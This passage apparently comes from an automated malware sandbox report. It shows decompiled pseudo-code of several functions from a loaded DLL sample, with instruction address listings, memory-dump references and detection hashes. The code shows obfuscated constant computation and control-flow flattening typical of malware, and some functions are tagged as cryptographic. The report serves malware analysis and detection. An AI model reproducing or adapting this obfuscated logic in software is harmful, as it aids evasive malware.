							_t174 = E02B02BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
							_t219 =  &(_t219[3]);
							__eflags = _t174;
							if(__eflags != 0) {
								_t189 = 0xed0c1fc;
								continue;
							}
						} else {
							if(_t189 == 0xa1356c9) {
								_t177 = E02B02BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
								_t219 =  &(_t219[3]);
								__eflags = _t177;
								if(__eflags != 0) {
									_t189 = 0x2e69388;
									continue;
								}
							} else {
								if(_t189 == 0xd5f0997) {
									__eflags = E02AF9D3E( &_v60, _v88, __eflags, _v112, _t215);
									_t216 =  !=  ? 1 : _t216;
								} else {
									if(_t189 == 0xe0c62fa) {
										_t189 = 0xe1d6fcd;
										continue;
									} else {
										if(_t189 == 0xe1d6fcd) {
											E02AE22A6(_a4, _v120,  &_v60, _v100);
											_t219 =  &(_t219[2]);
											_t189 = 0xa1356c9;
											continue;
										} else {
											if(_t189 != 0xed0c1fc) {
												goto L19;
											} else {
												_t182 = E02B02BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
												_t219 =  &(_t219[3]);
												if(_t182 != 0) {
													_t189 = 0x2d570bf;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L22:
						return _t216;
					}
					_t172 = E02B02BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
					_t219 =  &(_t219[3]);
					__eflags = _t172;
					if(__eflags == 0) {
						_t189 = 0x63acd9;
						goto L19;
					} else {
						_t189 = 0xd5f0997;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t189 - 0x63acd9;
				} while (__eflags != 0);
				goto L22;
			}




































                                                                                                          0x02af8810
                                                                                                          0x02af8817
                                                                                                          0x02af8818
                                                                                                          0x02af881f
                                                                                                          0x02af8820
                                                                                                          0x02af8821
                                                                                                          0x02af8826
                                                                                                          0x02af882e
                                                                                                          0x02af8831
                                                                                                          0x02af8839
                                                                                                          0x02af883b
                                                                                                          0x02af8841
                                                                                                          0x02af8845
                                                                                                          0x02af884a
                                                                                                          0x02af8858
                                                                                                          0x02af885d
                                                                                                          0x02af8863
                                                                                                          0x02af8868
                                                                                                          0x02af8870
                                                                                                          0x02af887d
                                                                                                          0x02af8880
                                                                                                          0x02af8884
                                                                                                          0x02af888c
                                                                                                          0x02af8899
                                                                                                          0x02af889d
                                                                                                          0x02af88aa
                                                                                                          0x02af88ae
                                                                                                          0x02af88b6
                                                                                                          0x02af88be
                                                                                                          0x02af88c6
                                                                                                          0x02af88ce
                                                                                                          0x02af88d6
                                                                                                          0x02af88de
                                                                                                          0x02af88ee
                                                                                                          0x02af88f2
                                                                                                          0x02af88fa
                                                                                                          0x02af8902
                                                                                                          0x02af890a
                                                                                                          0x02af8912
                                                                                                          0x02af891a
                                                                                                          0x02af8922
                                                                                                          0x02af892a
                                                                                                          0x02af8932
                                                                                                          0x02af8937
                                                                                                          0x02af893f
                                                                                                          0x02af8947
                                                                                                          0x02af894f
                                                                                                          0x02af8957
                                                                                                          0x02af8964
                                                                                                          0x02af8965
                                                                                                          0x02af8969
                                                                                                          0x02af8971
                                                                                                          0x02af897f
                                                                                                          0x02af8983
                                                                                                          0x02af898b
                                                                                                          0x02af8993
                                                                                                          0x02af899b
                                                                                                          0x02af89a8
                                                                                                          0x02af89ac
                                                                                                          0x02af89b4
                                                                                                          0x02af89c4
                                                                                                          0x02af89d1
                                                                                                          0x02af89d5
                                                                                                          0x02af89d9
                                                                                                          0x02af89de
                                                                                                          0x02af89e6
                                                                                                          0x02af89ee
                                                                                                          0x02af89f6
                                                                                                          0x02af89fe
                                                                                                          0x02af8a06
                                                                                                          0x02af8a0b
                                                                                                          0x02af8a13
                                                                                                          0x02af8a1b
                                                                                                          0x02af8a23
                                                                                                          0x02af8a2b
                                                                                                          0x02af8a33
                                                                                                          0x02af8a37
                                                                                                          0x02af8a3f
                                                                                                          0x02af8a47
                                                                                                          0x02af8a47
                                                                                                          0x02af8a51
                                                                                                          0x02af8b22
                                                                                                          0x02af8b27
                                                                                                          0x02af8b2a
                                                                                                          0x02af8b2c
                                                                                                          0x02af8b2e
                                                                                                          0x00000000
                                                                                                          0x02af8b2e
                                                                                                          0x02af8a57
                                                                                                          0x02af8a5d
                                                                                                          0x02af8af7
                                                                                                          0x02af8afc
                                                                                                          0x02af8aff
                                                                                                          0x02af8b01
                                                                                                          0x02af8b07
                                                                                                          0x00000000
                                                                                                          0x02af8b07
                                                                                                          0x02af8a63
                                                                                                          0x02af8a69
                                                                                                          0x02af8b8c
                                                                                                          0x02af8b8e
                                                                                                          0x02af8a6f
                                                                                                          0x02af8a75
                                                                                                          0x02af8ad9
                                                                                                          0x00000000
                                                                                                          0x02af8a77
                                                                                                          0x02af8a7d
                                                                                                          0x02af8ac7
                                                                                                          0x02af8acc
                                                                                                          0x02af8acf
                                                                                                          0x00000000
                                                                                                          0x02af8a7f
                                                                                                          0x02af8a85
                                                                                                          0x00000000
                                                                                                          0x02af8a8b
                                                                                                          0x02af8a9f
                                                                                                          0x02af8aa4
                                                                                                          0x02af8aa9
                                                                                                          0x02af8aaf
                                                                                                          0x00000000
                                                                                                          0x02af8aaf
                                                                                                          0x02af8aa9
                                                                                                          0x02af8a85
                                                                                                          0x02af8a7d
                                                                                                          0x02af8a75
                                                                                                          0x02af8a69
                                                                                                          0x02af8a5d
                                                                                                          0x02af8b92
                                                                                                          0x02af8b9d
                                                                                                          0x02af8b9d
                                                                                                          0x02af8b4c
                                                                                                          0x02af8b51
                                                                                                          0x02af8b54
                                                                                                          0x02af8b56
                                                                                                          0x02af8b62
                                                                                                          0x00000000
                                                                                                          0x02af8b58
                                                                                                          0x02af8b58
                                                                                                          0x00000000
                                                                                                          0x02af8b58
                                                                                                          0x00000000
                                                                                                          0x02af8b67
                                                                                                          0x02af8b67
                                                                                                          0x02af8b67
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $P$>_)$Eh}$\:$d%$i*
                                                                                                          • API String ID: 0-2969320698
                                                                                                          • Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
                                                                                                          • Instruction ID: d4404d1ac99710663306be979c391f5d10b48e79d396d36e032295a50b373249
                                                                                                          • Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
                                                                                                          • Instruction Fuzzy Hash: 559132B15083419FD798CF61D58992BBBF1EBC4708F00891DF696962A0D7B99A09CF83
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEBFBE, Relevance: 7.6, Strings: 6, Instructions: 149COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AEBFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t131;
				signed int _t135;
				signed int _t139;
				void* _t143;
				void* _t146;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				signed int* _t163;

				_t144 = _a4;
				_push(_a8);
				_t161 = __edx;
				_push(_a4);
				_push(__edx);
				E02AFFE29(_t131);
				_v56 = 0x2e7fee;
				_t163 =  &(( &_v68)[4]);
				_v56 = _v56 | 0x8bf0d90c;
				_v56 = _v56 + 0xffff841c;
				_t157 = 0;
				_v56 = _v56 ^ 0x8bfe8408;
				_t146 = 0xe8f06a4;
				_v20 = 0xd3cae8;
				_v20 = _v20 + 0xffff2712;
				_v20 = _v20 ^ 0x00d2f1ea;
				_v16 = 0xd3a0fd;
				_t158 = 0x75;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x4001cf0d;
				_v40 = 0x4f1d62;
				_v40 = _v40 + 0xffffc4cc;
				_v40 = _v40 + 0xffffbca6;
				_v40 = _v40 ^ 0x004e2d6a;
				_v8 = 0x24ed33;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x1279d784;
				_v12 = 0xe170a7;
				_t135 = _v12;
				_t159 = 0x28;
				_t155 = _t135 % _t159;
				_v12 = _t135 / _t159;
				_v12 = _v12 ^ 0x0006bc2e;
				_v44 = 0x4d8c8f;
				_v44 = _v44 | 0xffeffd4f;
				_v44 = _v44 ^ 0xffe079b2;
				_v48 = 0xc3edaa;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 + 0xd49e;
				_v48 = _v48 ^ 0x0004c7fe;
				_v68 = 0x67444f;
				_v68 = _v68 + 0x90d;
				_v68 = _v68 * 0x5b;
				_v68 = _v68 | 0x263824b0;
				_v68 = _v68 ^ 0x26bf9150;
				_v52 = 0xb09b3a;
				_v52 = _v52 ^ 0xfa5715e4;
				_v52 = _v52 ^ 0xfae78c15;
				_v24 = 0xeb1207;
				_v24 = _v24 + 0xffffe226;
				_v24 = _v24 ^ 0x00e7632f;
				_v28 = 0x3b6554;
				_v28 = _v28 ^ 0x4e84398c;
				_v28 = _v28 ^ 0x4eb32e0d;
				_v60 = 0x36daca;
				_v60 = _v60 ^ 0xae85a6ca;
				_v60 = _v60 ^ 0x532e6d02;
				_v60 = _v60 ^ 0xfd946988;
				_v64 = 0xe9416a;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x000bb9db;
				_v32 = 0xb764c3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xd93a5796;
				_v4 = 0xb5f3f2;
				_v4 = _v4 ^ 0xf880d4e7;
				_v4 = _v4 ^ 0xf834d19c;
				_t160 = _v4;
				_v36 = 0x2d4acf;
				_v36 = _v36 | 0x966edff9;
				_v36 = _v36 ^ 0x966c13d3;
				do {
					while(_t146 != 0x2926179) {
						if(_t146 == 0x8f0c602) {
							E02B01538(_v4, _v36, _t160);
						} else {
							if(_t146 == 0xb296bf4) {
								_t143 = E02AFC41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
								_t163 =  &(_t163[8]);
								_t157 = _t143;
								_t146 = 0x8f0c602;
								continue;
							} else {
								if(_t146 != 0xe8f06a4) {
									goto L10;
								} else {
									_t146 = 0x2926179;
									continue;
								}
							}
						}
						L13:
						return _t157;
					}
					_t155 = _v40;
					_t139 = E02B045CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
					_t160 = _t139;
					_t163 =  &(_t163[0xc]);
					if(_t139 == 0xffffffff) {
						_t146 = 0xe2d92d;
						goto L10;
					} else {
						_t146 = 0xb296bf4;
						continue;
					}
					goto L13;
					L10:
				} while (_t146 != 0xe2d92d);
				goto L13;
			}































                                                                                                          0x02aebfc2
                                                                                                          0x02aebfc9
                                                                                                          0x02aebfcd
                                                                                                          0x02aebfcf
                                                                                                          0x02aebfd0
                                                                                                          0x02aebfd2
                                                                                                          0x02aebfd7
                                                                                                          0x02aebfdf
                                                                                                          0x02aebfe2
                                                                                                          0x02aebfec
                                                                                                          0x02aebff4
                                                                                                          0x02aebff6
                                                                                                          0x02aebffe
                                                                                                          0x02aec003
                                                                                                          0x02aec00b
                                                                                                          0x02aec013
                                                                                                          0x02aec01b
                                                                                                          0x02aec029
                                                                                                          0x02aec02e
                                                                                                          0x02aec034
                                                                                                          0x02aec03c
                                                                                                          0x02aec044
                                                                                                          0x02aec04c
                                                                                                          0x02aec054
                                                                                                          0x02aec05c
                                                                                                          0x02aec064
                                                                                                          0x02aec069
                                                                                                          0x02aec071
                                                                                                          0x02aec079
                                                                                                          0x02aec07d
                                                                                                          0x02aec07e
                                                                                                          0x02aec080
                                                                                                          0x02aec084
                                                                                                          0x02aec08c
                                                                                                          0x02aec094
                                                                                                          0x02aec09c
                                                                                                          0x02aec0a4
                                                                                                          0x02aec0ac
                                                                                                          0x02aec0b1
                                                                                                          0x02aec0b9
                                                                                                          0x02aec0c1
                                                                                                          0x02aec0c9
                                                                                                          0x02aec0d6
                                                                                                          0x02aec0da
                                                                                                          0x02aec0e2
                                                                                                          0x02aec0ea
                                                                                                          0x02aec0fa
                                                                                                          0x02aec102
                                                                                                          0x02aec10a
                                                                                                          0x02aec112
                                                                                                          0x02aec11a
                                                                                                          0x02aec122
                                                                                                          0x02aec12a
                                                                                                          0x02aec132
                                                                                                          0x02aec13a
                                                                                                          0x02aec142
                                                                                                          0x02aec14a
                                                                                                          0x02aec152
                                                                                                          0x02aec15a
                                                                                                          0x02aec162
                                                                                                          0x02aec167
                                                                                                          0x02aec16b
                                                                                                          0x02aec173
                                                                                                          0x02aec17b
                                                                                                          0x02aec180
                                                                                                          0x02aec188
                                                                                                          0x02aec190
                                                                                                          0x02aec198
                                                                                                          0x02aec1a0
                                                                                                          0x02aec1a4
                                                                                                          0x02aec1ac
                                                                                                          0x02aec1b4
                                                                                                          0x02aec1bc
                                                                                                          0x02aec1bc
                                                                                                          0x02aec1ca
                                                                                                          0x02aec27c
                                                                                                          0x02aec1d0
                                                                                                          0x02aec1d6
                                                                                                          0x02aec208
                                                                                                          0x02aec20d
                                                                                                          0x02aec210
                                                                                                          0x02aec212
                                                                                                          0x00000000
                                                                                                          0x02aec1d8
                                                                                                          0x02aec1de
                                                                                                          0x00000000
                                                                                                          0x02aec1e4
                                                                                                          0x02aec1e4
                                                                                                          0x00000000
                                                                                                          0x02aec1e4
                                                                                                          0x02aec1de
                                                                                                          0x02aec1d6
                                                                                                          0x02aec282
                                                                                                          0x02aec28b
                                                                                                          0x02aec28b
                                                                                                          0x02aec23f
                                                                                                          0x02aec247
                                                                                                          0x02aec24c
                                                                                                          0x02aec24e
                                                                                                          0x02aec254
                                                                                                          0x02aec260
                                                                                                          0x00000000
                                                                                                          0x02aec256
                                                                                                          0x02aec256
                                                                                                          0x00000000
                                                                                                          0x02aec256
                                                                                                          0x00000000
                                                                                                          0x02aec265
                                                                                                          0x02aec265
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: /c$3$$ODg$Te;$j-N$jA
                                                                                                          • API String ID: 0-1439100758
                                                                                                          • Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
                                                                                                          • Instruction ID: 9f15bcdbf25517926444cf7404820a2057a446902bcd7d3310e57f56f6a6f669
                                                                                                          • Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
                                                                                                          • Instruction Fuzzy Hash: B06134710183409FC798CFA5D89981BBBF2FBC5718F405A1DF6D696260C3B58A1ACF52
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF2142, Relevance: 6.6, Strings: 5, Instructions: 329COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02AF2142() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				unsigned int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t368;
				intOrPtr _t378;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t389;
				void* _t390;
				void* _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				intOrPtr _t438;
				intOrPtr _t439;
				intOrPtr _t441;
				void* _t444;
				signed int _t446;
				signed int* _t448;

				_t448 =  &_v160;
				_v16 = 0x961399;
				_v12 = 0x301936;
				_v8 = 0xe566e6;
				_t391 = 0;
				_t444 = 0x374f925;
				_v4 = _v4 & 0;
				_v108 = 0x7426fd;
				_v108 = _v108 + 0xfffff8c3;
				_t393 = 0x2b;
				_push("true");
				_v108 = _v108 / _t393;
				_v108 = _v108 ^ 0x0002b357;
				_v156 = 0x38452;
				_v156 = _v156 + 0x4117;
				_pop(_t394);
				_v156 = _v156 * 0x30;
				_v156 = _v156 + 0xffff7c1f;
				_v156 = _v156 ^ 0x00b47fcf;
				_v152 = 0x5ef941;
				_v152 = _v152 * 0x43;
				_v152 = _v152 >> 7;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x0c6d9e00;
				_v120 = 0x18b538;
				_v120 = _v120 * 0x11;
				_v120 = _v120 + 0xffffc33e;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 ^ 0x00000d1e;
				_v112 = 0x5e5e29;
				_v112 = _v112 + 0x9b22;
				_v112 = _v112 / _t394;
				_v112 = _v112 ^ 0x0002e0c4;
				_v144 = 0x808e79;
				_v144 = _v144 | 0xf9cc6bdf;
				_v144 = _v144 + 0xffff3e00;
				_v144 = _v144 << 0xf;
				_v144 = _v144 ^ 0x16ff716d;
				_v28 = 0xba41b5;
				_v28 = _v28 + 0xffffb1dd;
				_v28 = _v28 ^ 0x00b49e8e;
				_v68 = 0x38cb33;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x000b8367;
				_v44 = 0xd85990;
				_v44 = _v44 ^ 0x9ad510f8;
				_v44 = _v44 ^ 0x9a039936;
				_v104 = 0xf87474;
				_t395 = 0x22;
				_v104 = _v104 / _t395;
				_v104 = _v104 >> 7;
				_v104 = _v104 ^ 0x000753f7;
				_v36 = 0x3be84a;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x0ef6677c;
				_v128 = 0x4404d4;
				_v128 = _v128 ^ 0xb10c689b;
				_t396 = 0x5e;
				_v128 = _v128 / _t396;
				_v128 = _v128 ^ 0x298e6a61;
				_v128 = _v128 ^ 0x28610484;
				_v80 = 0xdf65bd;
				_t397 = 0x7c;
				_v80 = _v80 / _t397;
				_v80 = _v80 ^ 0x00023fe8;
				_v96 = 0x7747b3;
				_v96 = _v96 << 0xd;
				_t398 = 0x29;
				_v96 = _v96 * 0x16;
				_v96 = _v96 ^ 0x052c7385;
				_v88 = 0xae51fb;
				_v88 = _v88 + 0x359a;
				_v88 = _v88 | 0x8b717ce6;
				_v88 = _v88 ^ 0x8bfa7840;
				_v24 = 0xcaf683;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00013e33;
				_v52 = 0xefed62;
				_v52 = _v52 | 0x058c509b;
				_v52 = _v52 ^ 0x05e11655;
				_v160 = 0xbd94ea;
				_v160 = _v160 + 0x2a3a;
				_v160 = _v160 >> 5;
				_v160 = _v160 + 0x96e3;
				_v160 = _v160 ^ 0x0003401d;
				_v72 = 0x73d84b;
				_v72 = _v72 + 0x3d83;
				_v72 = _v72 ^ 0x007dedc2;
				_v76 = 0xd9453f;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x006ac7af;
				_v140 = 0x85d58e;
				_v140 = _v140 * 0x2c;
				_v140 = _v140 >> 4;
				_v140 = _v140 / _t398;
				_v140 = _v140 ^ 0x000cf91a;
				_v100 = 0x1458f8;
				_v100 = _v100 ^ 0xd74f5ef9;
				_t399 = 0x5f;
				_v100 = _v100 / _t399;
				_v100 = _v100 ^ 0x0247f1d9;
				_v64 = 0x476ab5;
				_v64 = _v64 + 0xffff3492;
				_v64 = _v64 ^ 0x004c13d1;
				_v148 = 0x4dca07;
				_v148 = _v148 + 0xffff4a4e;
				_v148 = _v148 + 0xffff2093;
				_v148 = _v148 ^ 0x004c8279;
				_v136 = 0xa6ed90;
				_v136 = _v136 >> 2;
				_v136 = _v136 | 0x950d13bb;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x000e92a5;
				_v60 = 0xea20ae;
				_v60 = _v60 * 0x5d;
				_v60 = _v60 ^ 0x550aff98;
				_v92 = 0xe3a2d4;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x28;
				_v92 = _v92 ^ 0x008d85d0;
				_v132 = 0x9d5db8;
				_v132 = _v132 + 0xffff1bd6;
				_t400 = 0x1b;
				_v132 = _v132 / _t400;
				_v132 = _v132 << 0xa;
				_v132 = _v132 ^ 0x17217366;
				_v56 = 0xa7c0ff;
				_t401 = 0x35;
				_v56 = _v56 / _t401;
				_v56 = _v56 ^ 0x000623f9;
				_v116 = 0xf9a70;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 >> 5;
				_v116 = _v116 + 0xffffd532;
				_v116 = _v116 ^ 0xfff34a0b;
				_v124 = 0xd1e957;
				_v124 = _v124 << 3;
				_t402 = 0x76;
				_v124 = _v124 / _t402;
				_v124 = _v124 + 0x1a27;
				_v124 = _v124 ^ 0x000dfee3;
				_v84 = 0x8b01d8;
				_t403 = 0x34;
				_v84 = _v84 * 0x70;
				_v84 = _v84 / _t403;
				_v84 = _v84 ^ 0x0120e28f;
				_v32 = 0xcb988c;
				_v32 = _v32 ^ 0x945cb942;
				_v32 = _v32 ^ 0x9495c850;
				_v40 = 0x79d8e1;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x000c7724;
				_v48 = 0xc03196;
				_v48 = _v48 ^ 0x1279a3f1;
				_v48 = _v48 ^ 0x12baef9a;
				while(1) {
					L1:
					_t368 = 0x9ae396c;
					do {
						L2:
						if(_t444 == 0x19911bc) {
							_push(_v52);
							_push(_v24);
							_push(_v88);
							_t446 = E02AFE1F8(0x2ae1a20, _v96, __eflags);
							__eflags = E02AE738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
							_t403 = _t446;
							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
							E02AFFECB(_t403, _v140, _v100, _v64, _v148);
							_t448 =  &(_t448[0xb]);
							_t368 = 0x9ae396c;
							goto L12;
						}
						if(_t444 == 0x374f925) {
							_push(_t403);
							_push(_t403);
							_t378 = E02AEC5D8(0x44);
							 *0x2b06220 = _t378;
							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
							_t383 =  *0x2b06220; // 0x0
							_t384 = E02AEC5D8( *((intOrPtr*)(_t383 + 0x28)));
							_t438 =  *0x2b06220; // 0x0
							_t448 =  &(_t448[4]);
							_t444 = 0x19911bc;
							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
							 *(_t438 + 0x20) = _t403;
							while(1) {
								L1:
								_t368 = 0x9ae396c;
								goto L2;
							}
						}
						if(_t444 == 0x7737a40) {
							_t439 =  *0x2b06220; // 0x0
							E02B02B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
							_t441 =  *0x2b06220; // 0x0
							E02B02B09(_v32, _t441, _v40, _v48);
							L16:
							return _t391;
						}
						if(_t444 == 0x9042860) {
							E02AEF7FE(_v132, _v20, _v56, _v112);
							goto L16;
						}
						if(_t444 != _t368) {
							goto L12;
						}
						_t389 =  *0x2b06220; // 0x0
						_t403 = _v20;
						_t390 = E02AF8B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
						_t448 =  &(_t448[5]);
						if(_t390 != _v120) {
							_t444 = 0x7737a40;
						} else {
							_t444 = 0x9042860;
							_t391 = 1;
						}
						goto L1;
						L12:
						__eflags = _t444 - 0xe3acfc2;
					} while (__eflags != 0);
					goto L16;
				}
			}



































































                                                                                                          0x02af2142
                                                                                                          0x02af2148
                                                                                                          0x02af2155
                                                                                                          0x02af2160
                                                                                                          0x02af216f
                                                                                                          0x02af2171
                                                                                                          0x02af2176
                                                                                                          0x02af217d
                                                                                                          0x02af2185
                                                                                                          0x02af2193
                                                                                                          0x02af2196
                                                                                                          0x02af2198
                                                                                                          0x02af219e
                                                                                                          0x02af21a6
                                                                                                          0x02af21ae
                                                                                                          0x02af21bb
                                                                                                          0x02af21be
                                                                                                          0x02af21c2
                                                                                                          0x02af21ca
                                                                                                          0x02af21d2
                                                                                                          0x02af21df
                                                                                                          0x02af21e3
                                                                                                          0x02af21e8
                                                                                                          0x02af21ed
                                                                                                          0x02af21f5
                                                                                                          0x02af2202
                                                                                                          0x02af2206
                                                                                                          0x02af220e
                                                                                                          0x02af2213
                                                                                                          0x02af221b
                                                                                                          0x02af2223
                                                                                                          0x02af2233
                                                                                                          0x02af2237
                                                                                                          0x02af223f
                                                                                                          0x02af2247
                                                                                                          0x02af224f
                                                                                                          0x02af2257
                                                                                                          0x02af225c
                                                                                                          0x02af2264
                                                                                                          0x02af226f
                                                                                                          0x02af227a
                                                                                                          0x02af2285
                                                                                                          0x02af228d
                                                                                                          0x02af2292
                                                                                                          0x02af229a
                                                                                                          0x02af22a5
                                                                                                          0x02af22b0
                                                                                                          0x02af22bb
                                                                                                          0x02af22c7
                                                                                                          0x02af22cc
                                                                                                          0x02af22d2
                                                                                                          0x02af22d7
                                                                                                          0x02af22df
                                                                                                          0x02af22ea
                                                                                                          0x02af22f2
                                                                                                          0x02af22fd
                                                                                                          0x02af2305
                                                                                                          0x02af2311
                                                                                                          0x02af2314
                                                                                                          0x02af2318
                                                                                                          0x02af2320
                                                                                                          0x02af232a
                                                                                                          0x02af2338
                                                                                                          0x02af233d
                                                                                                          0x02af2343
                                                                                                          0x02af234b
                                                                                                          0x02af2353
                                                                                                          0x02af235d
                                                                                                          0x02af2360
                                                                                                          0x02af2364
                                                                                                          0x02af236c
                                                                                                          0x02af2374
                                                                                                          0x02af237c
                                                                                                          0x02af2384
                                                                                                          0x02af238c
                                                                                                          0x02af2397
                                                                                                          0x02af239f
                                                                                                          0x02af23aa
                                                                                                          0x02af23b5
                                                                                                          0x02af23c0
                                                                                                          0x02af23cb
                                                                                                          0x02af23d3
                                                                                                          0x02af23db
                                                                                                          0x02af23e0
                                                                                                          0x02af23e8
                                                                                                          0x02af23f0
                                                                                                          0x02af23f8
                                                                                                          0x02af2400
                                                                                                          0x02af2408
                                                                                                          0x02af2410
                                                                                                          0x02af2414
                                                                                                          0x02af241c
                                                                                                          0x02af2429
                                                                                                          0x02af242d
                                                                                                          0x02af243a
                                                                                                          0x02af243e
                                                                                                          0x02af2446
                                                                                                          0x02af244e
                                                                                                          0x02af245a
                                                                                                          0x02af245d
                                                                                                          0x02af2461
                                                                                                          0x02af2469
                                                                                                          0x02af2471
                                                                                                          0x02af2479
                                                                                                          0x02af2481
                                                                                                          0x02af2489
                                                                                                          0x02af2499
                                                                                                          0x02af24a1
                                                                                                          0x02af24a9
                                                                                                          0x02af24b1
                                                                                                          0x02af24b6
                                                                                                          0x02af24be
                                                                                                          0x02af24c3
                                                                                                          0x02af24cb
                                                                                                          0x02af24d8
                                                                                                          0x02af24dc
                                                                                                          0x02af24e4
                                                                                                          0x02af24ec
                                                                                                          0x02af24f6
                                                                                                          0x02af24fa
                                                                                                          0x02af2502
                                                                                                          0x02af250a
                                                                                                          0x02af251f
                                                                                                          0x02af2524
                                                                                                          0x02af252a
                                                                                                          0x02af252f
                                                                                                          0x02af2537
                                                                                                          0x02af2543
                                                                                                          0x02af2548
                                                                                                          0x02af254e
                                                                                                          0x02af2556
                                                                                                          0x02af255e
                                                                                                          0x02af2563
                                                                                                          0x02af2568
                                                                                                          0x02af2570
                                                                                                          0x02af2578
                                                                                                          0x02af2580
                                                                                                          0x02af2589
                                                                                                          0x02af258e
                                                                                                          0x02af2594
                                                                                                          0x02af259c
                                                                                                          0x02af25a4
                                                                                                          0x02af25b1
                                                                                                          0x02af25b2
                                                                                                          0x02af25bc
                                                                                                          0x02af25c0
                                                                                                          0x02af25c8
                                                                                                          0x02af25d3
                                                                                                          0x02af25de
                                                                                                          0x02af25e9
                                                                                                          0x02af25f4
                                                                                                          0x02af25fc
                                                                                                          0x02af2607
                                                                                                          0x02af2612
                                                                                                          0x02af261d
                                                                                                          0x02af2628
                                                                                                          0x02af2628
                                                                                                          0x02af2628
                                                                                                          0x02af262d
                                                                                                          0x02af262d
                                                                                                          0x02af2633
